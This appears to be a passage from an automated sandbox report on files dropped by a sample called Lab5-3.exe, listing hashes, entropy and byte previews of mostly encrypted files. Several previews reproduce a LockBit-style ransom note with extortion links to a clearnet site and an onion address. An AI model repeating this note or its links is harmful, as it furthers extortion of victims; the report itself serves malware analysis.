                                                                                                          Preview:.W..o.t.bp{.p.X...i.8..0...v.."....A.].1.....O..4.1..|.=.d..;&|.wD!1..[...].|.".....9....?.....c{f.@@.....1.G.f....eh..=......`....4.<....Ox..E~o......b.:....(..lA4%.....ps.B..;..].;Rn..|.8...2D....OC..{.T:.*.0.........Jy.e.....ln0:.x..7......20....i.v..r. ....3.R...{.i.dW....?.........e}.....P+ ..v.2.S..%.12..TR........8..e..5}l.. ...z.L.uY....!..|..K....#......>.q..7_Pe%..;]......9..xQ.3[[..Nd=.Y..>.x#Q...H8+.....;...;...n3K..U......P.2Y.k..4p..d..v.4....T..&w.t.Wk...Ax.$....6(.f"[...z..|..:R<.....).-D|.~.".{......!;3L.....K...P`P.>...7..j.@lX6...5............}..02..bS.l>.i2...[c.|R..j.t..!.*J...x...K-..K.g....tzd..F...&6.../......\...OZ..n^.r.,=....'FC...`.....-.7..A.....r8...k.[kt..@$..v......r..Pe(s....{.i.U..eZ....S.<....@...2.Y.A'..3.9.."...so0..|.O.U..r._.M.K.....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2336
                                                                                                          Entropy (8bit):7.9188899162396265
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:MJC78cgGKfBjddnNxckrVHfUTid3hBaUoSGFcmeykEdEElU92i:M08eK5jdD+5Gx0uKeY2ElUJ
                                                                                                          MD5:6871631947A70F580FA04170E23B30CD
                                                                                                          SHA1:C4C5F3478A65929CFB00F9F4CBD901FD88BBA940
                                                                                                          SHA-256:82D6B44A5EADF871EB423B883CDAC0BB42FF2504E7B6BEA2A83C66C3AA50637B
                                                                                                          SHA-512:D9C1B29B1A6FDF8B28967FD01E8944BE9FEC72B7150C775F5CA19B2AC61BEED05A4D3A9E92D31EF4E83CE49B09FB1625CF9B17977288F077D4C75F59400CD0CF
                                                                                                          Malicious:false
                                                                                                          Preview:.0o)T....z'..b<F..1..Ia.eG......h4.:.w1...9..AM.mi..F.G:...U]f'~..........HX..r....3..!..S......;L..A..._:....H.@..\E.gr.....|...x..............sP.D.<b....+...3...N..j..@.P.2..........(.EX....t.[......C...e.&{....%..G.....1....<.h.78t.....n.........pt...dk.&&|.8.!@v.f..6,K..h.!.......<o...=W.....8...BO.~............V..>|..S.xw... ....sX..,C.P....VV..P...I.!......n4...l....5../.o$.7.D.P.{.*.i.+..x.......X.s.....a^z...f......[A..y... .%.E....cf5..y....[...3...".g...dj.q...-.. ..q......S.bl.kj...*..m&...\...jG...D..)z)$2..........&......O.<.1e.$..@.....p.a89.*..z..lT.L..pXw...I>nMwe........6.TU.q^+....Q..!..&3.i.u.>Z.>..{......9.O.$N.....).<W......p.c=PR..Y....o....(R.0.G...ZZ..7G6/v....AL..7C.....G..}A..py_c)..V.].`wZ.I.,.g....g8.;aO.a..gz2...X..:.....h..e.1.<K..$. ..>...L...B...6&Z......_.?K')...........D.Z.o...{..Z4.4.......6.....D..[..YsW......Y..).Q...O.@.|........E.~.)......}gH.Zj..n..`......43.?h....O...\#...`...,.......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2544
                                                                                                          Entropy (8bit):7.928129103002603
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:mg4oWfIgQ0MNYFpYYWAB+wsOtpaHfUTid3hBaUoSGFcmeykEdEElU92i:mg9WfdMWpYY5B+2p1Gx0uKeY2ElUJ
                                                                                                          MD5:E35BDB09BC3782C29831FDB34BD14F1A
                                                                                                          SHA1:16F1ED6DF6A8B7420954D7A7BA916F01154D7E73
                                                                                                          SHA-256:E51D1E1AF1E311AB84047824D5096EC0CEB157C7B41D9BC2D7D0D49461663001
                                                                                                          SHA-512:00B9F1A0073D06DBE182B939F5FDDD0A66B7686214BD344A70E51B29ABCBE27FB86A3639537BBDFFFDCF68813984BC7B755AAFE51B58E018D922EA5EF8A5FEE4
                                                                                                          Malicious:false
                                                                                                          Preview:.$..._.....).6.D...D.o.q.Z.75j..:.m1..5.s]..:2..~.(x._%B$.(....-.c/...(W....P...Ogv!...s..d.k.b.2.7j.M..))v..e...V.R1. $0.O5...7..{.9{UL.0.....f^.\......=....x..*K.G...Y.....A...X\..eY.].....E.<t;.....M.R......cW..N.7o....1..mm.....q....Td.j....H..-.!...LB....e...H.8..{...U.[>...L.eS.$.~!..|..{r..T6.....U.~.h.81.....Y.5G..?....n#.1.1s.q.I....U.cg......Z.u..S...vp6.~....T.f..Bp".i.[.cR......^.<...0.q...zPP...Y.o...=..g...rxi..*.....k..SL......n..aT..g/}..L..&..?.hEz...a$W.Z/(..vg`\.;..<#S....C..G.YU.....e.Oyj"..m({.o..E....?..D../...N'......'......-_.`.H*-..#..{D.d..7..p.\..L.....c*^...U..."..|K.vw.Vd..`q....u.T..[U0...zK..Y..az(.|)(.-+H.?R.|K.0....u..[........+.`....[.....h3"..T.N7..k..40.U.r..7.+aJ\...+....FNPv..%"j.Ea.@.-.}.4Xu.{.p.DN...Wr.CN....O..tQ..-_...y.....v...yCD(&...8#..q.*M".5...i..[.C.oc..N.eE.I....6/../...._.O.d...&.......A....N..g.r.Ujt..pL...M.;...8../.}2.!6..1...M=H.I,A..j."elt.N... Y..@Y...[..-.h..gg.~....h.Y.....V..RU=(
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2160
                                                                                                          Entropy (8bit):7.917671066579348
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:u39No1bbGOkySGJg6J1K8UdkPTu3HfUTid3hBaUoSGFcmeykEdEElU92i:u39+13GpGOGDUdncGx0uKeY2ElUJ
                                                                                                          MD5:AF68B71DA02DE76ABC09DB0E9549601C
                                                                                                          SHA1:8191B17B5626C281E9713BC31789BB769856FC65
                                                                                                          SHA-256:1C9A14ACFAE5BFB1BB7B215F1F2A0E517190A5880EE47902922B61B34C288AEB
                                                                                                          SHA-512:75C126A14341ADB736C430BEB1B7F86D33390A0474A020FD21F0BA8D1DCBD347087AE2E7E9DF26CCD3F7EBAE05939912DCE49FEE3555A8DA54B683C2CBE162B1
                                                                                                          Malicious:false
                                                                                                          Preview:;.\...D..P.C_8.........../.i.8...p..S{.,...DY.[..Zx..,...6-.n).:.>L.iL3.{J..A.=....O..$|.....".q......A..I.K.P.....+.U.jP....iR'*IY\W...w..FM.#...`.....c.p...]..6........l...v4..2..D.uF.e.n.lr-.$...........$.2..\.w.V.\.4...s".=3...D...SA.&m"$..6.P..]..h.d9vS..z.Q..!CO6..L@..#~.....#=.+.......7...u.).5..t.7p.g|`....'\R../|..6.{.o.E .{..2A.V9..../._.\.d.Jp.i.A.<s.j~...`7l.L...(*o_ 8w..!..I$.s..fb.d...........Ax...*...#L..%....b.1Y%!.... ..e..Q^..>........<.UN#. W.S..J\.....*O..`...HY[.86>.......M...4o./N....h.^.IXI...F.e.....!.}c.n*.$....c>. ..0..D.0....d^......Ez<../cv+...w..c{...:......@v..{;.....zDx..v.Qr....t<..\.O...*..q+M....I........&;....b/%...cQ....z@.E..]u......^._.ie..EL.,......._uI[...*......<.u.z....,.!..A..B.>....3VbpE....F.....j.b;..B..w..L>x.........x'../.kQ......F&ZE,..{b..K..O".4.....fn....4F............^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,.....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Secret Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2432
                                                                                                          Entropy (8bit):7.932980468456345
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:nNIroco2u8Ljg50GYwucDn9ZbEZDgJUtGHfUTid3hBaUoSGFcmeykEdEElU92i:nmFu8oCZwuE9ZbmgmtZGx0uKeY2ElUJ
                                                                                                          MD5:9C449C43CD1E33AFBB5A19DCB99D49FB
                                                                                                          SHA1:818EE539BE2D7DC223A982D804E61D8951EA3626
                                                                                                          SHA-256:988DD4CFD15BDB4A37DBBBE380B130187FD6FBB4487EB4277FC20A7B4DA2BCEC
                                                                                                          SHA-512:16FCE7F9B29401148ADB4A2F81A325F7A9AEC108F38BC401991195D11F3E4CA70D1CA25C6DDCD572446A987C3E70B12D09019D90B1A25781FD75262C142DA170
                                                                                                          Malicious:false
                                                                                                          Preview:.Nwp.r.....I...N.s1...9G.b2u;.J.`..f.HA........o....O.....0|....O...Q'... 6pP:Hd.W..+.'...+.##..KUC.....9......,..}.E...Rl.u".m..P76..[.$.:.?Z?.. .v..t._...uFwf.K@.*T.R".3.w....fc.x...1...q?..........K.o.>/I....s..k.....M....N..i...%.9..r.8....gJ..x..2..u.q..<...t....."-$..O..O6.$3..Z....s.....%.(#...o.c'`..`5....}..n...I.Q.d.7.g..M.f......^.I....E.K$Y>...g._!s..Y.(._{s.*2.+.5.......<f`..*./n'...+].^=.@.R...^..7&.'.f`f.AaP...}.5.'...=..q.r..R....-.#.=9z!#u......K......UU.AV.`.....g.N.....H6.........(Fo.Qe...x:Q..N.1....H?..F...0..!....r.D..Y9k..7..1.i.{M..c.S...+...K..#..J.p.\_........#..#amsd.....;;\F.)..!.X..p..4..C.....S...@.u`.{....\...xx..<-uz....yo.4..<..:..n.x..i...'.1..K.....g...].n|.....h..Jw.r$1.......%..H..+..&..n.)....*.X..=q.l......1"HM...Y...m..k..0iB.=J...6{p.o....}.. E].\..-..{..HJZ.a.X_.T...?.}.D.F7.B.p\.b.7|..a\.:GT.Z.'..;...J?.q$../c.j.p.<...cyc.....[,f2.y.........QP......;F.....@?z.#A+uR.3.>.+....y.>2..k.\......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2752
                                                                                                          Entropy (8bit):7.933199819576613
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:1eOeBcxbWciWrTZt6HPEnzMTGMbelpZsz3lHfUTid3hBaUoSGFcmeykEdEElU92i:1fxbWcdtoH0ziGbPcOGx0uKeY2ElUJ
                                                                                                          MD5:4AC1519A31947F16FC3A01A56236FD46
                                                                                                          SHA1:61816BFCAFB2864B09AF6F37003388EA301ACB0D
                                                                                                          SHA-256:E40AF33F6DC465532CB66F3987ECC689F7BABB3E9032E36800A4D0550320F287
                                                                                                          SHA-512:DA1D8B8BEC584D5FC12168AAA1E76C8DC7F916023D9AB0A6321CCC37C847448D83B2397D6237105B43A16BC0DFD5C635419FFA5B6F01E485415C19E93E40D6A0
                                                                                                          Malicious:false
                                                                                                          Preview:T.Sa.~......x..QpDS...o..OH.X%.s....T.2...9t..h.u.Q.Q.VC.e.",3O.....Z..'R.@..j...j.........f..{...w.fj&... w..%...a ....O.g=l8xli.kF.<...j..,....b...Vc.......Y_U.j._..I..........+9....}.6e3.D.U.....d4..A..........~..4.....3..P^...M/......i..n....2TR.r..#../."..j...I..~.4..|.u.......X....|..zH..=m...p.7(.r......Pf=...phh .u.zT.2rV....<.M...K0....h.)%E.0.....Y`.".?@z.dX.r..I...8D..T...V<.s$.r.X.F...|.P}.D..).{.^.W,.k+.%..U.e......s~;[E..n...}.0Rw.....q....[..T...';.6.0....S..<.\.n"!..=we..#.NVoF.O>.r9V^+...Lf.a..q....b..N7....4l:.o@....ta.........Kq...H.3.^..A..s...u..6.|..q..........2W..{\.......`.`.C.m. ...0 ..2.*....H.i..l....1...\.,.),..{.u..r..Z......Z&.....o.. zD.p.}..g^..cJ.xGY.[q...L=f...n..~b.......W....+.-...M..V......S.@+..{Y..uJ.`....&h....uI..F...m$.....^}.N(F.gKfR-h...#w.!....s!'M.rX.PS....J.F..(....{.:.Vk4.&l._Qd..._.....i...O. :..WGP./%>.D ..w...ixC.;.?...c ..4B..G/.......8.5u.2Q.....~.Z......-....0S..Q.z.1..VJ<..f\.21..`.Y.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2816
                                                                                                          Entropy (8bit):7.9371759248357705
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:HjuE54UPGEhKMH+9W5QHnXDWkap6czJIvoHfUTid3hBaUoSGFcmeykEdEElU92i:DTxuy+AQc1aGx0uKeY2ElUJ
                                                                                                          MD5:605EE0CCC94EDCD1D61AC44CA8B87E4C
                                                                                                          SHA1:87D32AB4A25644329B4F69A2B38187693EBC5F03
                                                                                                          SHA-256:EE600950F8F2EDD948318BC38BB2B3D647B24F21BF38FB45021B42E6D4B82532
                                                                                                          SHA-512:E5312D50871205F55F352B0ABA7D55F05D9BE706323FB8A391731885A77303D2F64F0783EE7A1A04CFD3C9648E09D7D22D4BCA6B8C8C945AB75D97365BCA1AE1
                                                                                                          Malicious:false
                                                                                                          Preview:.Tl...c..:.kEL.....8K..2.B....N.>..M.z..w..y..2.-.H..a..6....]&.Q...`.l.P7.xwc.......[Z .K..5.....1..T...@d.d..09....n..1.;..."...&..&6...V.........C......5=z!......%X..g.Oh,.Q~..wy.o....~........i.G..s1.w1..lZ.l..;:.Cf......^.i.s.-_.Y..j.;...2.V<t..)&....-.BG.Mp....k.n...&;.a...S.^.R.y.m.'.U.^..a..)s.)'i.N.p68.....&.+)o...LL..Y.Z2.TR+..I.IzG..)y......d....)...$...6.i61..8....._.I..4O.x.+.1..Uq..+T.e...hX....4>..L...:w...{..d.....P....%.K}2....P...]..}....H..w....@....J..W..x...0Z....yS.'..R..@..x.c.PQ.L...z3Z..0.+...Y.X.P....`J.d.....,i.#..M.].HJ..*...ytC..9........./..cO...~.F....S........0.e"....$W}.J .{.#X$|tr.A*Q.....O..^...5..>.G...R..U.:v.I..B..S..../..._w.f(...<.o*...Q.$..lu._._Z..9.*.T...2..B2.......(T6#.Ac..6C?]jew]..?q.....:s.(V..4.LIG..#j.nb.u.1.......|...S.9.t_...qQ...LT..Z._{B...P..b/.q..j.M..O?K.....5..s../.JQC....\..M.p..f..X!....f..PEW@...Pv....C.....K...#......{I....tR....[....VW."..P.gg.7Q..TQ.3-!iQ..X..L.$ q..c. ..?.&..s.t..T
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3120
                                                                                                          Entropy (8bit):7.944092348400785
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:nhMKlTwEj2KXjBKkV/t6rzvGx0uKeY2ElUJ:hXwEyuBTVcPM0Cb
                                                                                                          MD5:26A02D7F824DE8ECB50674B7A494128A
                                                                                                          SHA1:4390C5D306A1C7010F4C4DB448980CDEE649E470
                                                                                                          SHA-256:0A16E28690200E61CBDC9B67C23A680D314CD4A49BAD157E797F18735E9E369C
                                                                                                          SHA-512:ABB133C93A2995D497FA0B225C1032BF6C1ED48ED2763F584360374A1E974B5B184F93E5D6A71963E5605FB38E1DA611D3D1A5A0A12B907D2A8ACA669DCFDC6A
                                                                                                          Malicious:false
                                                                                                          Preview:...=..@.R>BEp$..;.(..fA.E.l.......J..qKn....,..g'B.D..xl.9.....+.........PP..I+|x.]sbF...r.m.rP.I..."\yv.W.y.......r6....R...^t..^i.@...2..Az.2dw...0a..3"........I......!.B...B......2.X.nn.[Z./.>.[...}.4..M:...b..uS%.(..1.5.RW$...),Q[.....'Z.0K..S.7ff....P.JCZp&..z.".=...,m..X..Ox...3<d^...M..T......F.'.L.....~.6.%I....l.M.. ..k.%..;6.._...C'.|.....R..?...m.......tL...a..'SE....H....).....|KH.O4..>..a.5P..*..G...........z.....3*&.1x..b.:5..8....j...-1.....0F....(.........?^;......{.S.)M(..F3 .H.c.......Ycz#.......(..`Z.j.iJ....J...I5;Z;.....$-z...v@........% .#.. \..x....\98....|(?...3 .y..@.>gr\...?...._.Q..r......@.O.Q.q....+N..Kq../.X.....:J.U(xC....7T.X`.We.G.^*T.y..6.L.o.....6K.&Zo~.O".E.9..m.....'....._v.88d2.....^.o.......Z..d.W.....g'.%]....AI.TO.D...s...5.2..\.c8.I..L...n.1t..*...V.i....J..lT.....0.~.)..:Tk...w.e..D.g.,_.6.2f.[a....9%J(.../...J......"......2..4./.qh..p.9...\.?..C.%#+h.[..o.v',bG..P38..;.?.E..b.c..52[.~..f. .
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):408726
                                                                                                          Entropy (8bit):7.624495948274929
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:X/KxEb8/sVX5qAZmaJ8v/pFEBUjh84N38VwfEgslvdXAC2Z:yx0VX5zgvBFC2HNMifmv2
                                                                                                          MD5:063A89FAFFAFC5E0D7D04E6BDDA0D215
                                                                                                          SHA1:73D21704E033D133F842D3F234ADF9EDD9AFB568
                                                                                                          SHA-256:77EECD77F599DACF6AAFAC00EB1077B40306FBBA7DFAADE67091464C2C210352
                                                                                                          SHA-512:A297A9748FC908FB9CF6EFE7880117630AD9DA41EB4749D8C60B892304B1E8744295E7AA718E986C58C98227A5AE79B528E11A07408AC12EFBC45C4242D6BA1E
                                                                                                          Malicious:false
                                                                                                          Preview:vU..U.3.U.h,..>........A..fV,:eS..=...|..zgu..g.......m.2X.3:...{.....g..7..D8.O..U.<...R......*....`(....X.=E*.t..7Zt_.,8.[~..Y.2T._k1KoX....!OP..2.PL...{.!...v...m..._i.-}.i..^Hc.?.W..k..q..3Lp.<.z..\M...`..r..*.. n..1....O.c.O....I..P.8.....W[...S...~..1..}..-m..9.L...P4q.....U.3z..}p..c..i......q/e-.)&b...uu............>H>...oe.....AK.....8.......m.r.[...L...DQ.....'..N..v.......T.~/..%$..D\JM.^Or.9..r..{........S+Hi...#.2....h..jy....k......:..N.k...}..D.WG.1..z..... ...Gg..i&&&e..>.t.z.1LD%.....l.'....oD%...n.\.].........9..c4....y...."o.t...'.^....(....zW.Ck......>....*.._Jg.j.....R...*.n.+..:P_.>8.H...q.$n.7...0..\)..v...?..pMH.?..Bm.......^/.';s..5...=.[0Ol.V....pD....r..,t....Q..A.].VN...k..G..Y]7_..^f.oK.......R.M...U..D.....]7..R...d.r.\s5C.L.)....}.....9....%6S....^=Y...V8..Ejm..Y....%.b.F..K....W...(`SH.........u..(..+.(Rc}....:.O...0..*.Gx.^....j=M.-.Hh.......y....|...k..-([..K....R.w..@^...)|...O2.qS..p..(.P.>s4..).I.....B
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):267491
                                                                                                          Entropy (8bit):7.997977928876171
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:6144:6/e2x+W3OPRajQUwwP+/uWyWmrxBZja4biBHAIz+hCGeZaZ:6/eO+W38zPwPOu/HqH1+hzi+
                                                                                                          MD5:D373774331F652A044CF3E2ED246913E
                                                                                                          SHA1:84D523CC866653DFCB44E4ABDC6B364F171D77EE
                                                                                                          SHA-256:829A530A96D8CEE35698796269E75BB537606996EFD61860668F371D41827EC4
                                                                                                          SHA-512:86D4EE488B0EA5B53FD635EBDAD942DA3FF2785127113E55A54ADBE3D83CA01E76FD6DA3046385C7876EC19D1E8EB2637AD67FE909B9D16A23F505DF8120BD02
                                                                                                          Malicious:true
                                                                                                          Preview:....&T......4.`..........&c..Q.i.b....V....P....k.@....Y..#.aN.|...s^.0Lvsa....w....d.=....w.K.M...}.....(]b{.F...1:/g.$.6}.".D.a......a!.-.m..:|.U..'.7c/n....B.56.(.2hy.....,=....Ov..$GA<.6..i....E.}.k."&.e..;'&.6kd.p.R.s....qS._e..-m...o.....j).8A$g.{}*8..g...H.%.'.......1....r.....d.h.A..7.g... \.a.......s.C.k.....k.v..Z.3....:.>B.....7.DG29..Q..g......&>L..yF...B.~C&.....E...i:.L..........W.EbX.&.......k=..r...;...;.9...x...D.@c.z3..D.....O...<.7..T..8G.v...qG...x.+..2.]....2.......TC._.c...@4.=#.H|p.Wx.$z.<...Ba...$.u..w.c.... W..o.'_...a9.o.........D.A....j....2.]Lyc......2..7..l.=...,Tx:.Af.......Q4.~a.)...m.....$..........,..UK...q.f.&.d'KXmC......>0U.r....g`.Y.H"f$c.-.}.......y..mL.n.,.j*..N.K.-j\..E...Co.itd.o.|.o....R...i.p.1.YV.._...$..R..-m...?@F.yj.k..j.......-..)RE....Z9\.\E...A<.....H..Q.5;s...:s..{.]G...,.E.I..b;.."v.*.)Z..E.....@..Y.....$o..C...U....K;..7X.|..b...!....>...q..D/.(.k.(.V..3.w{....1%.7O...>.'..Dh....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6400
                                                                                                          Entropy (8bit):7.9713151599280785
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:zDN+Rhl6g5xsC+e4js8IgGvAJosF200Cb:3NUx5xsPAhg4AJo020tb
                                                                                                          MD5:5DBE8B0A2B9F7BA7B74DC057D521CA6B
                                                                                                          SHA1:A1ABB0F7E7B56586A959608C41ACA07FD15EE944
                                                                                                          SHA-256:010FC773C916A6B86243E56DDBF1D065E5D6B3650BC2FD597B34BE691A1A5CFC
                                                                                                          SHA-512:3C517046C1026C0FC06C8F4C40CA0A446F5003708FED022072E9D467B11147944E3F36AE83553C3D31BBFDADB65E59115BD4E6AD1CAA3D193E5687828E42B475
                                                                                                          Malicious:false
                                                                                                          Preview:..Zz......W.M..-..;.H.-...o.....m.5.....;tS._.E.#k....R..k.....$.g1(..A...&.&.".|..J......H....Z7.F....H.]d/9..h.u.;.8.3.-...Xls........D.h...4u...5..&......*....9e+.dl.>.Z.r"A.2.h..../...6'.{..f..%m...>...~E[0..\....7..D..Mm$!....u..Q.i..[.....+'h.tb..`r...w....#l..R.$'.0.qM.v...&..Tm...z..1..JC.(C.e.~..g..._^........a..7..R..V..u......,.d......)..xq.m.m.../?..A.C0......Y...."=..\6.......y.h..O....S....Aq...u.%......~.d.E(... "...=..@..=&...#.%D.OE\5.y.OF\g)_.YX.t.C$.z.r.{.....r...G..D.q.#.je.....b.v3d.G...!?>[z.G&^.............P.@k.;.?5L......s...v.|...}....~.o;.W.}D.V|.......?B9yN..9.RSDmM8n.D...B.]..Ne.....$T..l....f.[.$.:.k...6(. ..........-.[aq,U.7-&...%B...N..=.IA0w..P...R..D>.^..]v....&'..h.yKG.9W.X\t?...5.EeHq..Z.~....`.|..e1..7....T....BM.p.S....*.#.....l.....(.G`...9^2...'.i.'.V..........S.eISAJ..)..n....p..P..$eZ..^+4..U.....qbO.!.!f0.e!..d ......=...`.'..#8..A..P.......V.I...q.l}..@..CUZkuG .w.?.d(..,I7:9..n+/W...h...<..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):16464
                                                                                                          Entropy (8bit):7.989620667496588
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:yd2VErjO+vyI7+jMUKno+n5vnjQmaBxHwjiE5tb:e0F+lsKnBZj9DZ
                                                                                                          MD5:6674AA73EFDF13D5BD05FBE52B0B0826
                                                                                                          SHA1:8353B5766052CC7B19F4BCCCDE5A6F7FB4746D26
                                                                                                          SHA-256:438ED6EBA904B4721D44F6D99CCAD4F922ACD51219E75EAC983805149E81CC61
                                                                                                          SHA-512:F6BD636707CFD615D820A97A2A27645CA2FC0754FB4645F90B13D4008B0486A0D048595F901B63FCA75212BEE37DFBF13D42C26D28C88918292AF1BD9F73521D
                                                                                                          Malicious:false
